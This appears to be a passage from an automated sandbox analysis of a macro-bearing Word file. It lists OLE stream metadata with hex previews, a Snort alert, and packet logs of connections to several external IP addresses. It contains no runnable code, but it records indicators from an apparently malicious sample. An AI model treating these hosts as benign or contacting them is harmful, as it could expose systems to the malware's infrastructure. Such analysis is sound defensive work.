                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 53 65 62 79 5f 72 71 34 6b 38 6d 70 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 267
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:267
                                                                                                                        Entropy:4.72118950953
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U 2 v 6 a y d k x z 3 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 32 76 36 61 79 64 6b 78 7a 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7343
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                        File Type:data
                                                                                                                        Stream Size:7343
                                                                                                                        Entropy:5.44101932672
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                                                        Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1429
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                        File Type:data
                                                                                                                        Stream Size:1429
                                                                                                                        Entropy:6.86901589365
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . . A . ! O f f i c .
                                                                                                                        Data Raw:01 91 b5 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 e1 f1 d1 61 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 271
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:271
                                                                                                                        Entropy:4.74916908167
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } Y 6 l m x n g 9 u k v y 6 9 c . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 59 36 6c 6d 78 6e 67 39 75 6b 76 79 36 39 63 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 267
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:267
                                                                                                                        Entropy:4.687609726
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } Z 4 l x 7 r w d f q e . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 5a 34 6c 78 37 72 77 64 66 71 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: WordDocument, File Type: data, Stream Size: 32814
                                                                                                                        General
                                                                                                                        Stream Path:WordDocument
                                                                                                                        File Type:data
                                                                                                                        Stream Size:32814
                                                                                                                        Entropy:3.80167925486
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . { . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 b4 7b 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 80 00 00 ce 90 01 00 ce 90 01 00 b4 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        03/16/21-14:20:53.246460TCP1201ATTACK-RESPONSES 403 Forbidden8049175185.104.45.33192.168.2.22

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Mar 16, 2021 14:27:10.592955112 CET4972080192.168.2.5185.104.45.33
                                                                                                                        Mar 16, 2021 14:27:10.659269094 CET8049720185.104.45.33192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.659401894 CET4972080192.168.2.5185.104.45.33
                                                                                                                        Mar 16, 2021 14:27:10.660463095 CET4972080192.168.2.5185.104.45.33
                                                                                                                        Mar 16, 2021 14:27:10.726577997 CET8049720185.104.45.33192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.732536077 CET8049720185.104.45.33192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.732588053 CET8049720185.104.45.33192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.732660055 CET4972080192.168.2.5185.104.45.33
                                                                                                                        Mar 16, 2021 14:27:11.291416883 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:11.523667097 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:11.523818970 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:11.547408104 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:11.790451050 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:11.790522099 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:11.790568113 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:11.790669918 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:11.795928001 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.030214071 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.055788040 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.338952065 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550766945 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550801992 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550822020 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550844908 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550869942 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550894022 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550900936 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.550910950 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550932884 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.550982952 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.784440994 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784487009 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784514904 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784538984 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784601927 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.784652948 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.863569975 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:12.994874954 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.995023012 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:12.995368004 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.129111052 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.132900953 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.132968903 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.133013010 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.133073092 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.163969040 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.295587063 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.302031994 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.473725080 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.524260998 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.586406946 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.658648968 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.790016890 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.790157080 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.790486097 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.923022985 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926629066 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926655054 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926667929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926764011 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.928303003 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.063785076 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.064877987 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.238434076 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330480099 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330511093 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330527067 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330547094 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330565929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330581903 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330596924 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330612898 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330620050 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.330629110 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330650091 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330681086 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.330705881 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461632967 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461657047 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461674929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461690903 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461707115 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461726904 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461770058 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461811066 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461828947 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461894035 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461982965 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461993933 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.462013960 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.462029934 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.462146997 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.594285965 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594315052 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594327927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594346046 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594364882 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594383955 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594400883 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594414949 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594428062 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594439983 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594456911 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594475985 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594496965 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594563007 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.595146894 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.599009991 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728688002 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728718996 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728733063 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728749037 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728766918 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728781939 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728802919 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728821993 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728837967 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728859901 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728868961 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728890896 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728909969 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.731950045 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.731970072 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732003927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732023001 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732039928 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732043982 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.732062101 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732094049 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.732119083 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.859628916 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859663010 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859687090 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859710932 CET44349723107.180.2.185192.168.2.5
